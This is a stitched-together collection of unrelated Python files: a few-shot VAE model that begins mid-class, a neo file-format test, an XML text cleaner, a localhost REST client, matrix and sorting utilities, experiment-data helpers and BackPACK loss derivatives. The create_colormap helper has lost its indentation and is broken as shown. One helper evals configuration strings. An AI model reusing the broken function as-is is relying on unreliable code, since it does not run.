        use_train = split == 'train'
        self.image_roots = task.train_roots if use_train else task.test_roots
        self.labels = task.train_labels if use_train else task.test_labels

    def __len__(self):
        return len(self.image_roots)

    def __getitem__(self, idx):
        raise NotImplementedError("You need to specify the dataset")
class Omniglot(FewShotDataset):
    """Concrete few-shot dataset that loads Omniglot-style images from disk."""

    def __init__(self, *args, **kwargs):
        super(Omniglot, self).__init__(*args, **kwargs)

    def __getitem__(self, idx):
        # load, force 3 channels and resize to the 84x84 network input size
        image = Image.open(self.image_roots[idx])
        image = image.convert('RGB').resize((84, 84), resample=Image.LANCZOS)
        if self.transform is not None:
            image = self.transform(image)
        target = self.labels[idx]
        if self.target_transform is not None:
            target = self.target_transform(target)
        return image, target
class ClassBalancedSampler(Sampler):
    """Yields `num_per_class` indices for each of `num_cl` classes.

    Items are assumed to be grouped by class: class j owns the contiguous
    index range [j*num_inst, (j+1)*num_inst).
    """

    def __init__(self, num_per_class, num_cl, num_inst, shuffle=True):
        self.num_per_class = num_per_class
        self.num_cl = num_cl
        self.num_inst = num_inst
        self.shuffle = shuffle

    def __iter__(self):
        indices = []
        for cls in range(self.num_cl):
            if self.shuffle:
                # random subset of this class's instances
                picks = torch.randperm(self.num_inst)[:self.num_per_class]
            else:
                # first num_per_class instances (clamped to num_inst)
                picks = range(self.num_inst)[:self.num_per_class]
            indices.extend(i + cls * self.num_inst for i in picks)
        if self.shuffle:
            random.shuffle(indices)
        return iter(indices)

    def __len__(self):
        return 1
def conv_block(in_channels, out_channels):
    """3x3 conv -> batch-norm -> ReLU -> 2x2 max-pool (halves spatial size)."""
    layers = [
        nn.Conv2d(in_channels, out_channels, 3, padding=1),
        nn.BatchNorm2d(out_channels),
        nn.ReLU(),
        nn.MaxPool2d(2),
    ]
    return nn.Sequential(*layers)
class VAE(nn.Module):
    """Variational auto-encoder over conv-backbone embeddings.

    The backbone `pn` maps an 84x84 RGB image to a 64*5*5 feature vector;
    fc21/fc22 produce the latent mean and log-variance, and fc4 decodes a
    latent sample back to feature space.

    NOTE(review): fc1 and fc3 are defined but never used in this class; they
    only affect the parameter/state-dict layout (do not remove without
    invalidating existing checkpoints).
    """
    def __init__(self):
        super().__init__()
        # four conv blocks: 84x84 input -> 64-channel 5x5 feature map
        self.pn = nn.Sequential(conv_block(3, 64), conv_block(64, 64), conv_block(64, 64), conv_block(64, 64))
        self.fc1 = nn.Linear(64*5*5, 256)   # unused (kept for state-dict compatibility)
        self.fc21 = nn.Linear(64*5*5, 256)  # latent mean head
        self.fc22 = nn.Linear(1600, 256)    # latent log-variance head (1600 == 64*5*5)
        self.fc3 = nn.Linear(64, 256)       # unused (kept for state-dict compatibility)
        self.fc4 = nn.Linear(256, 64*5*5)   # decoder back to feature space
        self.relu = nn.ReLU()
    def encode(self, x):
        # x is a (tensor, role) pair; role is 'support' or 'query'
        # (both roles currently take the same path through the backbone)
        label = x[1]
        x_ = x[0]
        if label == 'support':
            emb_x = self.pn(x_)
            emb_x = emb_x.view(emb_x.shape[0], -1)
        elif label == 'query':
            emb_x = self.pn(x_)
            emb_x = emb_x.view(emb_x.shape[0], -1)
        # NOTE(review): if label is neither 'support' nor 'query', emb_x is
        # unbound and the next line raises UnboundLocalError
        h1 = self.relu(emb_x)
        return emb_x, self.fc21(h1), self.fc22(h1)
    def reparameterize(self, mu, logvar):
        # standard VAE trick: z = mu + sigma * eps, with sigma = exp(logvar/2)
        std = logvar.mul(0.5).exp_()
        eps = Variable(std.data.new(std.size()).normal_())
        return eps.mul(std).add_(mu)
    def decode(self, z):
        # map a latent sample back to the 64*5*5 feature space in [0, 1]
        h3 = F.relu(z)
        return torch.sigmoid(self.fc4(h3)).view(-1, 64*5*5)
    def forward(self, x):
        # returns (raw embedding, reconstruction, latent mean, latent logvar)
        emb_x, mu, logvar = self.encode(x)
        z = self.reparameterize(mu, logvar)
        return emb_x, self.decode(z), mu, logvar
class Loss(nn.Module):
    """Combined prototypical/VAE loss: cross-entropy over distance logits plus
    a scaled KL divergence term.

    NOTE(review): the reconstruction MSE terms are computed but NOT included
    in the returned loss (see forward's return statement); self.rec_loss is
    defined but never used.
    """
    def __init__(self):
        super().__init__()
        self.mse_loss = nn.MSELoss(size_average=False)  # summed (not averaged) reconstruction error
        self.rec_loss = nn.BCELoss(size_average=False)  # unused in this block
    def calculate_dist(self, a, b):
        # a: query embeddings (the larger set), b: support embeddings (the smaller set)
        #way = int(b.shape[0]/5)
        #shot = 5
        #b = b.reshape(shot, way, -1).mean(dim=0)
        # broadcast every query against every support vector
        a = a.unsqueeze(1).expand(a.shape[0], b.shape[0], -1)
        b = b.unsqueeze(0).expand(a.shape[0], b.shape[0], -1)
        # negative squared euclidean distance used as classification logits
        logits = -torch.pow(a-b, 2).sum(2)
        return logits
    def forward(self, embedding_support, recon_support, mu_support, logvar_support, x_support, embedding_query, recon_query, mu_query, logvar_query, x_query, labels):
        # reconstruction losses, normalized by batch size (computed but not returned)
        MSE_support = self.mse_loss(recon_support, embedding_support)/x_support.shape[0]
        MSE_query = self.mse_loss(recon_query, embedding_query)/x_query.shape[0]
        MSE = MSE_support + MSE_query
        # classify queries by distance to support latent means
        logits = self.calculate_dist(mu_query, mu_support)
        CE = torch.nn.functional.cross_entropy(logits, labels)
        #mu_support = mu_support.reshape(5,5,-1).mean(dim=0)
        #logvar_support = logvar_support.reshape(5,5,-1).mean(dim=0)
        # KL divergence of the latent distributions from the unit gaussian:
        # -0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)
        KLD_support = -0.5 * torch.sum(1 + logvar_support - mu_support.pow(2) - logvar_support.exp())
        KLD_query = -0.5 * torch.sum(1 + logvar_query - mu_query.pow(2) - logvar_query.exp())
        #KLD = KLD_support + KLD_query
        KLD = KLD_support/mu_support.shape[0] + KLD_query/mu_query.shape[0]
        #print(MSE,CE,KLD)
        return 0.1*KLD + CE, logits
|
"""
Tests of neo.rawio.axographrawio
"""
import unittest
from neo.rawio.axographrawio import AxographRawIO
from neo.test.rawiotest.common_rawio_test import BaseTestRawIO
class TestAxographRawIO(BaseTestRawIO, unittest.TestCase):
    """Standard raw-IO test suite applied to AxographRawIO.

    BaseTestRawIO drives the generic checks; this class only declares which
    IO class to test and which fixture files to use.
    """
    # IO class under test
    rawioclass = AxographRawIO
    files_to_download = [
        'AxoGraph_Graph_File',  # version 1 file, provided with AxoGraph
        'AxoGraph_Digitized_File',  # version 2 file, provided with AxoGraph
        'AxoGraph_X_File.axgx',  # version 5 file, provided with AxoGraph
        'File_axograph.axgd',  # version 6 file
        'episodic.axgd',
        'events_and_epochs.axgx',
    ]
    # every downloaded fixture is also exercised as a test entity
    entities_to_test = files_to_download


if __name__ == "__main__":
    unittest.main()
|
import sys, os, re
import xml.etree.ElementTree as ET
from functools import reduce
def cleanXML(filename, results_dir=""):
    """Split an XML file into a plain-text file (.txt) and a markup file (.diff).

    Reads the input one character at a time, writing tag characters to the
    .diff file and text content (whitespace-normalized in a second pass) to
    the .txt file, both placed in *results_dir*.

    NOTE(review): the output names are derived with filename.rindex('\\\\'),
    i.e. this assumes Windows-style backslash paths; on other platforms
    rindex raises ValueError for paths without a backslash.
    """
    origf = open(filename)
    temp = open("temp.txt", "w+")  # intermediate text-only scratch file
    tagf = open(results_dir + filename[filename.rindex('\\') + 1:len(filename) - 3] + "diff", "w+")
    loc = 0
    c = origf.read(1)
    tag = 0  # current tag nesting depth; 0 means we are in text content
    while c:
        if c == "<":
            tag += 1
            tagf.write(c)
            # replace the start of an outermost tag with a space in the text
            if (tag == 1): temp.write(' ')
        elif c == '>':
            tag -= 1
            tagf.write(c)
            temp.write(' ')
        elif tag == 0:
            # plain text content
            temp.write(c)
        else:
            # character inside a tag
            tagf.write(c)
        # read the next character, skipping undecodable bytes
        # NOTE(review): on UnicodeDecodeError the file position is not
        # explicitly advanced before retrying; the printed loc+1 looks like
        # leftover debug output -- confirm this recovery actually progresses
        while True:
            try:
                loc = origf.tell()
                c = origf.read(1)
                break
            except UnicodeDecodeError:
                print(loc + 1)
                continue
    origf.close()
    temp.close()
    tagf.close()
    # second pass: collapse all whitespace runs to single spaces
    cleanf = open(results_dir + filename[filename.rindex('\\') + 1:len(filename) - 3] + "txt", "w+")
    temp = open("temp.txt", "r")
    for line in temp:
        for word in line.split():
            if word:
                cleanf.write(word)
                cleanf.write(" ")
    cleanf.close()
    temp.close()
    os.remove("temp.txt")
def create_dict(s, filename):
    """Add every whitespace-separated word of *filename* (lower-cased) to set *s*
    and dump the accumulated vocabulary to shaker_dictionary.txt, one word per line.

    The dictionary file is rewritten on every call so it always reflects the
    full set accumulated so far.
    """
    # FIX: use context managers so the handles are closed even on error
    with open(filename) as f:
        for line in f:
            for word in line.split():
                s.add(word.lower())
    with open("shaker_dictionary.txt", "w+") as w:
        for word in s:
            w.write(word)
            w.write("\n")
def get_xml_names(filename):
    """Parse *filename* as XML and return the person names found in it.

    Collects the 'reg' attribute of every element whose TEIform attribute
    is 'persName' (depth-first document order).
    """
    root = ET.parse(filename).getroot()
    collected = []
    xml_traverse(root, collected)
    return collected
def xml_traverse(root, names):
    """Depth-first walk under *root*, appending to *names* (mutated in place)
    the 'reg' attribute of every element whose TEIform attribute is 'persName'.
    """
    for child in root:
        if child.attrib.get("TEIform") == "persName":
            names.append(child.attrib.get("reg"))
        # recurse unconditionally so nested persName elements are found too
        xml_traverse(child, names)
def clean_text(filename):
    """Print the sorted, de-duplicated list of alphabetic words in *filename*.

    ASCII letters are kept; common separator characters terminate the current
    word; all other characters are ignored.
    """
    collected = []
    with open(filename) as f:
        for line in f.readlines():
            word = ""
            for c in line:
                if ord('A') <= ord(c) and ord(c) <= ord('Z') or\
                   ord('a') <= ord(c) and ord(c) <= ord('z'):
                    word += c
                elif word and word[-1] != ' ' and c in [' ', '\t', '\n', '\r', '.', ',', '-']:
                    # BUG FIX: removed stray debug print(c) that polluted the
                    # function's stdout output with every separator character
                    word += ' '
            for w in word.split():
                collected.append(w.strip())
    print(*sorted(list(set(collected))), sep='\n')
def main():
    """Command-line dispatcher for the XML cleaning utilities.

    Usage patterns (dispatch on sys.argv):
      -d DIR RESULTS_DIR : clean every .xml file in DIR into RESULTS_DIR
      FILE               : clean a single file
      -c DIR             : build a word dictionary from all .txt files in DIR
      -n FILE            : print person names from one XML file
      -nd DIR            : print de-duplicated person names from all XML files
    """
    if sys.argv[1] == "-d" and len(sys.argv) == 4:
        print("Cleaning directory: " + sys.argv[2])
        for filename in os.listdir(sys.argv[2]):
            if filename.endswith(".xml"):
                print("Cleaning file: " + filename)
                cleanXML(str(os.path.join(sys.argv[2], filename)), sys.argv[3])
    elif len(sys.argv) == 2:
        filename = sys.argv[1]
        print("Cleaning file: " + filename)
        cleanXML(filename)
        # f = open(sys.argv[1])
        # print(*sorted(list(set([line.strip() for line in f]))), sep='\n')
        # clean_text(sys.argv[1])
    elif len(sys.argv) == 3 and sys.argv[1] == '-c':
        s = set()
        for filename in os.listdir(sys.argv[2]):
            if filename.endswith(".txt"):
                print("Processing: " + filename)
                create_dict(s, str(os.path.join(sys.argv[2], filename)))
        # print(*list(s), sep='\n')
    elif len(sys.argv) == 3 and sys.argv[1] == '-n':
        n = get_xml_names(sys.argv[2])
        print(n)
    elif len(sys.argv) == 3 and sys.argv[1] == "-nd":
        names = []
        for filename in os.listdir(sys.argv[2]):
            if filename.endswith(".xml"):
                # print("Gathering names from: " + filename)
                names.extend(get_xml_names(str(os.path.join(sys.argv[2], filename))))
        l = []
        # split multi-person entries on ';' or 'and' and normalize whitespace
        # NOTE(review): the bare substring test 'and' also splits names that
        # merely CONTAIN "and" (e.g. "Alexander") -- confirm intended
        for ns in list(set(names)):
            ns = str(ns)
            if ';' in ns:
                for n in ns.split(';'):
                    l.append(" ".join(n.split()))
            elif "and" in ns:
                for n in ns.split('and'):
                    l.append(" ".join(n.split()))
            else:
                l.append(" ".join(ns.split()))
        # NOTE(review): raises ValueError if "Editor" is not present in l
        l.remove("Editor")
        print(*[str(n).strip() for n in l], sep='\n')
    else:
        print("Command Line args are invalid.")


if __name__ == "__main__":
    main()
|
import requests
import json
def GET():
    # Prompt for a name and query the service for matching records.
    # (Python 2 script: raw_input and print statements.)
    name=raw_input("Enter the name u want to search for: ")
    uri= "http://localhost:8081/mainhand"
    payload={"name":name}
    # payload is passed positionally, i.e. as the `params` query-string dict
    r = requests.get(uri,payload)
    print r.status_code
    print r.text
def POST():
    # Prompt for a name and POST it to the service as a JSON body.
    name=raw_input("Enter the name u want to insert: ")
    uri= "http://localhost:8081/mainhand"
    payload={"name":name}
    r = requests.post(uri, data=json.dumps(payload))
    print r.status_code
    print r.text
def PUT():
    # Send a bodyless PUT to the service and report the result.
    uri="http://localhost:8081/mainhand"
    r = requests.put(uri)
    print r.status_code
    print r.text
def DELETE():
    # Prompt for a name and DELETE the matching record (name sent as JSON body).
    name=raw_input("Enter the name u want to delete: ")
    uri="http://localhost:8081/mainhand"
    payload={"name":name}
    r = requests.delete(uri, data=json.dumps(payload))
    print r.status_code
    print r.text
# Map menu number -> request handler
selectrequest = {
    1:GET,
    2:POST,
    3:PUT,
    4:DELETE}
print selectrequest
selection =-1
# Simple menu loop: 1-4 dispatch to the handlers above, 5 quits.
# NOTE(review): selection 0 passes the range check below but is not a key of
# selectrequest -> KeyError; also, on Python 2 input() evaluates the entry.
while(selection!=5):
    selection=int(input("Enter the type of request\n 1. GET \n 2. POST \n 3. PUT \n 4. DELETE \n 5. QUIT \n"))
    if (selection >= 0) and (selection <=4):
        selectrequest[selection]()
|
import sys
import math
def PrintMat(x, transpose):
    """Print matrix *x* (list of row lists) as a C `float fakeMat[4][4]` initializer.

    transpose -- when True, print the transposed matrix instead.

    FIX: made Python 2/3 compatible with identical output -- the old
    `x = map(list, zip(*x))` left a lazy map object on Python 3 (printing
    '<map object ...>'), and the print statements were Python-2-only syntax.
    """
    if transpose:
        # materialize as a list of lists so str(x) renders the values
        x = [list(row) for row in zip(*x)]
    # convert Python list syntax to C brace syntax, one row per line
    s = str(x)
    s = s.replace("[", "{")
    s = s.replace("]", "}")
    s = s.replace("}, ", "}, \n")
    print("float fakeMat[4][4] = ")
    print(s + ";")
# --- command-line parsing ---------------------------------------------------
# usage: script.py ANGLE AXIS [TX TY TZ] [transpose]
angle = float(sys.argv[1])
axis = sys.argv[2]
xTranslation = 0
yTranslation = 0
zTranslation = 0
# optional translation column (only read when all three values are given)
if len(sys.argv) >= 6:
    xTranslation = float(sys.argv[3])
    yTranslation = float(sys.argv[4])
    zTranslation = float(sys.argv[5])
transpose = False
if sys.argv[len(sys.argv)-1] == "transpose":
    transpose = True
# angle in degrees -> sine/cosine, rounded for readable C output
cosTheta = round(math.cos(angle*math.pi/180.0),4)
sinTheta = round(math.sin(angle*math.pi/180.0),4)
# homogeneous 4x4 rotation matrices about each axis, translation in the last column
xRot = [
    [ 1, 0, 0, xTranslation],
    [ 0, cosTheta, -sinTheta, yTranslation],
    [ 0, sinTheta, cosTheta, zTranslation],
    [ 0, 0, 0, 1]];
yRot = [
    [ cosTheta, 0, sinTheta, xTranslation],
    [ 0, 1, 0, yTranslation],
    [ -sinTheta, 0, cosTheta, zTranslation],
    [ 0, 0, 0, 1]];
zRot = [
    [ cosTheta, -sinTheta, 0, xTranslation],
    [ sinTheta, cosTheta, 0, yTranslation],
    [ 0, 0, 1, zTranslation],
    [ 0, 0, 0, 1]];
# print the matrix for the requested axis
if axis == "x":
    PrintMat(xRot,transpose)
if axis == "y":
    PrintMat(yRot,transpose)
if axis == "z":
    PrintMat(zRot,transpose)
|
# Helper functions
import glob
import os
import numpy as np
import warnings
import autodisc as ad
from io import BytesIO
from PIL import Image
def create_colormap(colors, is_marker_w=True):
MARKER_COLORS_W = [0x5F,0x5F,0x5F,0x7F,0x7F,0x7F,0xFF,0xFF,0xFF]
MARKER_COLORS_B = [0x9F,0x9F,0x9F,0x7F,0x7F,0x7F,0x0F,0x0F,0x0F]
nval = 253
ncol = colors.shape[0]
colors = np.vstack((colors, np.array([[0,0,0]])))
v = np.repeat(range(nval), 3) # [0 0 0 1 1 1 ... 252 252 252]
i = np.array(list(range(3)) * nval) # [0 1 2 0 1 2 ... 0 1 2]
k = v / (nval-1) * (ncol-1) # interpolate between 0 .. ncol-1
k1 = k.astype(int)
c1, c2 = colors[k1,i], colors[k1+1,i]
c = (k-k1) * (c2-c1) + c1 # interpolate between c1 .. c2
return np.rint(c / 8 * 255).astype(int).tolist() + (MARKER_COLORS_W if is_marker_w else MARKER_COLORS_B)
def transform_image_from_colormap(image, colormap):
    '''
    Function that transforms the color palette of a PIL image

    input:
        - image: the PIL image to transform
        - colormap: the desired colormap (flat palette list)
    output: the transformed PIL image
    '''
    # rescale intensities from [0, 255] into the 253 palette slots
    scaled = np.uint8(np.array(image).astype(float) / 255.0 * 252.0)
    result = Image.fromarray(scaled)
    result.putpalette(colormap)
    return result
def transform_image_PIL_to_bytes(image, image_format='png'):
    '''
    Function that serializes a PIL image to bytes

    input:
        - image: the PIL image to transform
        - image_format: the image format
    output: the image bytes
    '''
    with BytesIO() as buffer:
        image.save(buffer, image_format)
        # getvalue() copies the data, so it is safe to return from the with-block
        return buffer.getvalue()
def load_statistics(experiment_directory):
    """Load all saved statistics of an experiment from its 'statistics' folder.

    .npy files map to a single value; .npz files map to a dict of values.
    Raises ValueError if *experiment_directory* does not exist.
    """
    if not os.path.isdir(experiment_directory):
        raise ValueError('Directory {!r} does not exist!'.format(experiment_directory))
    stats_dir = os.path.join(experiment_directory, 'statistics')
    statistics = dict()
    for path in glob.glob(os.path.join(stats_dir, '*.npy')):
        name = os.path.splitext(os.path.basename(path))[0]
        value = np.load(path)
        # numpy stores scalars as 0-d arrays; unwrap to the native scalar type
        if len(value.shape) == 0:
            value = value.dtype.type(value)
        statistics[name] = value
    for path in glob.glob(os.path.join(stats_dir, '*.npz')):
        name = os.path.splitext(os.path.basename(path))[0]
        sub_stats = dict(np.load(path))
        # same scalar-unwrapping for every entry of the archive
        for sub_name, sub_value in sub_stats.items():
            if len(sub_value.shape) == 0:
                sub_stats[sub_name] = sub_value.dtype.type(sub_value)
        statistics[name] = sub_stats
    return statistics
def get_repetition_ids(experiment_id, repetition_ids):
    """Normalize a repetition selection to either slice(None) or a list of ids.

    repetition_ids: scalar int, list of ids, a dict mapping experiment id to
    either of those, or None / 'all' / ['all'] to select every repetition.
    """
    # None / 'all' / ['all'] selects all repetitions, like the ':' operator
    if repetition_ids is None or repetition_ids == 'all' or repetition_ids == ['all']:
        return slice(None)
    selected = repetition_ids
    if isinstance(selected, dict):
        # per-experiment selection
        selected = selected[experiment_id]
    return selected if isinstance(selected, list) else [selected]
def get_experiment_data(data=None, experiment_id=None, data_source=None, repetition_ids=None, data_filter=None, data_filter_inds=None):
    '''
    Retrieve (and optionally filter) the data of a single experiment.

    The datasource is a tuple which allows to specify sub sources.
    Example: If "data[experiment_id] = dict(upperlevel=dict(lowerlevel=[1, 2, 3]))"
    then "datasource = ('upperlevel', 'lowerlevel')" can retrieve the data.
    A data_filter can be given according to which the data gets filtered.
    See filter_single_experiment_data for the format of the filter.
    Otherwise boolean indices can be given (data_filter_inds) to filter the data.
    Please note that when indices are used and only a subset of repetition_ids
    are defined, then the filter inds must only have indices for those
    repetitions and not all repetitions.
    '''
    if data_source is None:
        data_source = []
    elif not isinstance(data_source, tuple):
        data_source = (data_source,)
    cur_repetition_ids = get_repetition_ids(experiment_id, repetition_ids)
    rep_data = data[experiment_id]
    # go through data to get to final datasource
    for data_source_elem in data_source:
        # strings of the form '[...]' applied to an ndarray are treated as an
        # index expression on the trailing axes; anything else is a key/index
        if isinstance(data_source_elem, str) and isinstance(rep_data, np.ndarray) and data_source_elem[0] == '[' and data_source_elem[-1] == ']':
            # NOTE(review): eval of the data_source string — only safe when the
            # source specification comes from trusted configuration
            rep_data = eval('rep_data[:,:,' + data_source_elem[1:-1] + ']')
        else:
            rep_data = rep_data[data_source_elem]
    # drop requested repetition ids that do not exist for this experiment
    if not isinstance(cur_repetition_ids, slice) and np.max(cur_repetition_ids) >= rep_data.shape[0]:
        warnings.warn('Experiment {!r} does not have all requested repetitions. Only the exisiting ones are loaded.'.format(experiment_id))
        cur_repetition_ids = [id for id in cur_repetition_ids if id < rep_data.shape[0]]
    if np.ndim(rep_data) == 1:
        rep_data = rep_data[cur_repetition_ids]
    else:
        rep_data = rep_data[cur_repetition_ids, :]
    if data_filter_inds is None and data_filter is not None and data_filter:
        # derive the boolean filter indices from the declarative filter
        data_filter_inds = filter_single_experiment_data(rep_data, data_filter)
    # if there is a filter, apply it to each repetition's data individually
    if data_filter_inds is not None:
        rep_data = [rep_data[rep_idx, data_filter_inds[rep_idx]] for rep_idx in range(rep_data.shape[0])]
    return rep_data
def get_datasource_data(data=None, experiment_ids=None, data_source=None, repetition_ids=None):
    """Collect per-datasource, per-experiment data.

    Returns (datasource_data, experiment_ids) where datasource_data is a list
    with one entry per data source, each being a list with one entry per
    experiment (produced by get_experiment_data).
    """
    collected = []
    if data is None:
        return collected, experiment_ids
    # normalize the experiment selection to an explicit list of ids
    if experiment_ids is None:
        experiment_ids = ['all']
    elif not isinstance(experiment_ids, list):
        experiment_ids = [experiment_ids]
    if experiment_ids == ['all']:
        experiment_ids = list(data.keys())
    # normalize data_source to a list (None becomes a single None source)
    sources = data_source if isinstance(data_source, list) else [data_source]
    for source in sources:
        per_experiment = [
            get_experiment_data(data=data,
                                experiment_id=eid,
                                data_source=source,
                                repetition_ids=repetition_ids)
            for eid in experiment_ids
        ]
        collected.append(per_experiment)
    return collected, experiment_ids
def transform_color_str_to_tuple(colors):
    """Parse 'name(r, g, b)' color strings into (name, r, g, b) tuples.

    Accepts a single string or a list of strings and mirrors the input shape.
    """
    single = not isinstance(colors, list)
    converted = []
    for text in ([colors] if single else colors):
        # turning the parentheses into commas lets a single split do the work
        parts = text.replace('(', ',').replace(')', ',').split(',')
        converted.append((parts[0], int(parts[1]), int(parts[2]), int(parts[3])))
    return converted[0] if single else converted
def transform_color_tuple_to_str(colors):
    """Render (name, c1, c2, c3) color tuples as 'name(c1, c2, c3)' strings.

    Accepts a single tuple or a list of tuples and mirrors the input shape.
    """
    single = not isinstance(colors, list)
    if single:
        colors = [colors]
    rendered = []
    for item in colors:
        rendered.append('{}({}, {}, {})'.format(item[0], item[1], item[2], item[3]))
    return rendered[0] if single else rendered
def replace_str_from_dict(string, dictionary):
    """Replace every '<key>' placeholder in *string* by the formatted dict value."""
    result = string
    for placeholder, value in dictionary.items():
        result = result.replace('<' + placeholder + '>', '{}'.format(value))
    return result
def filter_single_experiment_data(data, filter, repetition_id=None):
    """Recursively evaluate a filter expression against experiment data.

    A 3-tuple is (lhs, operator, rhs) with binary operators such as 'and',
    'or', comparisons and arithmetic; a 2-tuple is (reduction, operand) with
    'sum' / 'cumsum' / 'max' / 'min'.  A string is looked up inside *data*
    (falling back to the literal string on KeyError); anything else is
    returned unchanged as a literal value.
    """
    if isinstance(filter, tuple):
        if len(filter) == 3:
            lhs = filter_single_experiment_data(data, filter[0], repetition_id)
            rhs = filter_single_experiment_data(data, filter[2], repetition_id)
            binary_ops = {
                'and': lambda a, b: a & b,
                'or': lambda a, b: a | b,
                '<': lambda a, b: a < b,
                '<=': lambda a, b: a <= b,
                '>': lambda a, b: a > b,
                '>=': lambda a, b: a >= b,
                '==': lambda a, b: a == b,
                '!=': lambda a, b: a != b,
                '+': lambda a, b: a + b,
                '-': lambda a, b: a - b,
                '*': lambda a, b: a * b,
                '/': lambda a, b: a / b,
                '%': lambda a, b: a % b,
            }
            if filter[1] not in binary_ops:
                raise ValueError('Unknown operator {!r}!'.format(filter[1]))
            return binary_ops[filter[1]](lhs, rhs)
        elif len(filter) == 2:
            operand = filter_single_experiment_data(data, filter[1], repetition_id)
            unary_ops = {'sum': np.sum, 'cumsum': np.cumsum, 'max': np.max, 'min': np.min}
            if filter[0] not in unary_ops:
                raise ValueError('Unknown operator {!r}!'.format(filter[0]))
            return unary_ops[filter[0]](operand)
        else:
            raise ValueError('Unknown filter command {!r}!'.format(filter))
    if isinstance(filter, str):
        try:
            resolved = ad.helper.misc.get_sub_dictionary_variable(data, filter)
            # a missing repetition index also falls back to the literal string
            return resolved[repetition_id] if repetition_id is not None else resolved
        except KeyError:
            return filter
    return filter
def filter_experiments_data(experiments_data, filter, repetition_id=None):
    """Evaluate *filter* on every experiment; return {experiment_id: result}."""
    return {
        experiment_id: filter_single_experiment_data(experiment_data, filter,
                                                     repetition_id=repetition_id)
        for experiment_id, experiment_data in experiments_data.items()
    }
|
def bubbleSort(arr):
    """Sort *arr* in place in ascending order using bubble sort.

    Returns None (mutates the list).  A pass with no swaps means the list is
    already sorted, so we terminate early — this makes the best case O(n)
    instead of always O(n^2).
    """
    n = len(arr)
    for i in range(n):
        swapped = False
        for j in range(0, n - i - 1):
            if arr[j] > arr[j + 1]:
                arr[j], arr[j + 1] = arr[j + 1], arr[j]
                swapped = True
        if not swapped:
            break
# Driver code: sort a sample array in place and print it on one line
if __name__ == "__main__":
    arr = [12, 65, 23, 87, 55, 13, 18]
    bubbleSort(arr)
    print("Sorted array is:")
    for i in range(len(arr)):
        print("%d" % arr[i], end=" ")
|
"""Partial derivatives for cross-entropy loss."""
from math import sqrt
from torch import diag, diag_embed, einsum, multinomial, ones_like, softmax
from torch import sqrt as torchsqrt
from torch.nn.functional import one_hot
from backpack.core.derivatives.basederivatives import BaseLossDerivatives
class CrossEntropyLossDerivatives(BaseLossDerivatives):
    """Partial derivatives for cross-entropy loss.

    The `torch.nn.CrossEntropyLoss` operation is a composition of softmax
    and negative log-likelihood.
    """

    def _sqrt_hessian(self, module, g_inp, g_out):
        """Exact symmetric factorization S of the loss Hessian (H = S S^T)."""
        self._check_2nd_order_parameters(module)
        probs = self._get_probs(module)
        tau = torchsqrt(probs)
        V_dim, C_dim = 0, 2
        Id = diag_embed(ones_like(probs), dim1=V_dim, dim2=C_dim)
        Id_tautau = Id - einsum("nv,nc->vnc", tau, tau)
        sqrt_H = einsum("nc,vnc->vnc", tau, Id_tautau)
        if module.reduction == "mean":
            # 'mean' reduction scales the loss by 1/N, hence its sqrt by 1/sqrt(N)
            N = module.input0.shape[0]
            sqrt_H /= sqrt(N)
        return sqrt_H

    def _sqrt_hessian_sampled(self, module, g_inp, g_out, mc_samples=1):
        """Monte-Carlo approximation of the Hessian square root with M samples."""
        self._check_2nd_order_parameters(module)
        M = mc_samples
        C = module.input0.shape[1]
        probs = self._get_probs(module)
        V_dim = 0
        probs_unsqueezed = probs.unsqueeze(V_dim).repeat(M, 1, 1)
        # draw M class labels per sample from the softmax distribution
        multi = multinomial(probs, M, replacement=True)
        classes = one_hot(multi, num_classes=C)
        classes = einsum("nvc->vnc", classes).float()
        sqrt_mc_h = (probs_unsqueezed - classes) / sqrt(M)
        if module.reduction == "mean":
            N = module.input0.shape[0]
            sqrt_mc_h /= sqrt(N)
        return sqrt_mc_h

    def _sum_hessian(self, module, g_inp, g_out):
        """Sum of the per-sample Hessians (a [C x C] matrix)."""
        self._check_2nd_order_parameters(module)
        probs = self._get_probs(module)
        sum_H = diag(probs.sum(0)) - einsum("bi,bj->ij", (probs, probs))
        if module.reduction == "mean":
            N = module.input0.shape[0]
            sum_H /= N
        return sum_H

    def _make_hessian_mat_prod(self, module, g_inp, g_out):
        """Multiplication of the input Hessian with a matrix."""
        self._check_2nd_order_parameters(module)
        probs = self._get_probs(module)

        def hessian_mat_prod(mat):
            Hmat = einsum("bi,cbi->cbi", (probs, mat)) - einsum(
                "bi,bj,cbj->cbi", (probs, probs, mat)
            )
            if module.reduction == "mean":
                N = module.input0.shape[0]
                Hmat /= N
            return Hmat

        return hessian_mat_prod

    def hessian_is_psd(self):
        """Return whether cross-entropy loss Hessian is positive semi-definite."""
        return True

    def _get_probs(self, module):
        """Softmax probabilities of the module's input logits."""
        return softmax(module.input0, dim=1)

    def _check_2nd_order_parameters(self, module):
        """Verify that the parameters are supported by 2nd-order quantities.

        Attributes:
            module (torch.nn.CrossEntropyLoss): Extended CrossEntropyLoss module

        Raises:
            NotImplementedError: If module's setting is not implemented.
        """
        implemented_ignore_index = -100
        implemented_weight = None
        if module.ignore_index != implemented_ignore_index:
            raise NotImplementedError(
                "Only default ignore_index ({}) is implemented, got {}".format(
                    implemented_ignore_index, module.ignore_index
                )
            )
        # FIX: compare against None with identity, not `!=` — `weight` may be a
        # tensor, and `tensor != None` risks an elementwise comparison instead
        # of the intended "is a weight set at all" check (PEP 8 E711)
        if module.weight is not implemented_weight:
            raise NotImplementedError(
                "Only default weight ({}) is implemented, got {}".format(
                    implemented_weight, module.weight
                )
            )
|
"""Projection of conic sections (ellipses ... hyperbolae)
"""
from __future__ import print_function
import numpy as np
class Conic(object):
    """Bowshock shape - surface of revolution of a plane conic section

    As the shape parameter `th_conic` is varied, this gives a sequence
    from (`th_conic` = 45 - 90) oblate spheroid -> (`th_conic` = 45)
    sphere -> (`th_conic` = 0 - 45) prolate spheroid -> (`th_conic` =
    0) paraboloid -> (`th_conic` = -90 - 0) hyperboloid.

    All the shapes are normalized so that the nose of the bow is at
    unit distance from the bowshock source (star or proplyd), along
    the x-axis. The radius of curvature on this axis is set by
    another shape parameter, `A`

    The parameter `t` is not an angle, but the angle can be found with
    :method:`theta`
    """
    # parameter limits for the elliptical and hyperbolic/parabolic cases
    tlimits_e = -np.pi, np.pi
    tlimits_h = -5.0, 5.0

    def __init__(self, A=1.0, th_conic=45.0):
        # Hyperbolic or not?
        self.hyper = th_conic < 0.0
        self.sign = -1.0 if self.hyper else 1.0
        self.parab = th_conic == 0.0  # special case: parabola
        # Axis ratio
        self.b_a = np.tan(np.radians(abs(th_conic)))
